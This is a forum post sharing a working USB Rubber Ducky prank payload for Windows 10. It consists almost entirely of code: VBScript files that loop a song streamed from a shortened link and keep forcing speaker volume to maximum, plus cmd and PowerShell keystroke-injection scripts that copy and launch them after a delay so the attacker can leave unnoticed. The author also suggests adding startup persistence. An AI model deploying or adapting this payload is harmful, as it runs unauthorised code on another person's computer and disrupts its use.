Jump to content

Can't touch this

Sene0

By Sene0
in Classic USB Rubber Ducky

Recommended Posts

Sene0 Newbie

Sene0

Posted
Posted

I have found an old rickroll and modified it a little, similar to the exfiltration of documents payload here. It's made for a RubberDucky but I guess it works just as fine in the BashBunny. I didn't try it on the bunny yet tho.

You need your Ducky in the twin duck mode, so it functions as STORAGE and HID. Name it "_" and  then put a few files on it. With the Ducky it works in a few seconds for me.

rick.vbs

# This file downloads a song from a given source. I just downloaded some songs from youtube, uploaded them to a Dropbox and shortened the download link, to execute it maybe 1ms faster. The example given here will download "Can't touch me". 

While true
Dim oPlayer
Set oPlayer = CreateObject("WMPlayer.OCX")
oPlayer.URL = "https://tinyurl.com/yyac7cx7"
oPlayer.controls.play
While oPlayer.playState <> 1 ' 1 = Stopped
WScript.Sleep 100
Wend
oPlayer.close
Wend

volup.vbs

# This file will constantly set the volume of the speakers to 100%. Even if the user tries to lower it, it will be raised to maximum again. Also it slows the interaction of the user with the computer. 

do
Set WshShell = CreateObject("WScript.Shell")
WshShell.SendKeys(chr(&hAF))
loop

 

d.vbs

# This waits for a while so it's safe for you to walk away and don't have the computer start playing music while you're still at it which would be suspicious. Then it executes the other two scripts and starts playing. 

WScript.Sleep 10000
CreateObject("WScript.Shell").Run "rick.vbs"
CreateObject("WScript.Shell").Run "volup.vbs"

And finally I have two versions for the payload.txt, one with cmd and the other with powershell.

payload_cmd.txt 

REM Can't touch me
REM Target: Windows 10, Author: Sene0
REM Props to DarrenKitchen, bobflem
REM Starts cmd in 1 line with inverted colors
DELAY 2000
GUI r
DELAY 200
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K mode con:cols=80 lines=1
ENTER
DELAY 200
STRING copy E:\*.vbs %tmp%
ENTER
DELAY 200
STRING %tmp%\d.vbs
ENTER
DELAY 200
ALT F4

payload_powershell.txt 

REM Can't touch me
REM Target: Windows 10, Author: Sene0
DELAY 1000
GUI r
DELAY 100
STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.vbs')"
ENTER

 

If you want to quit the music from playing, you will have to sign out. That's the point where you could improve it, to run even as the user signs out in the background, or set it as a Startup Process, similar like crontab for linux.

I'm sure there's more to improve and I'd love to hear how.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...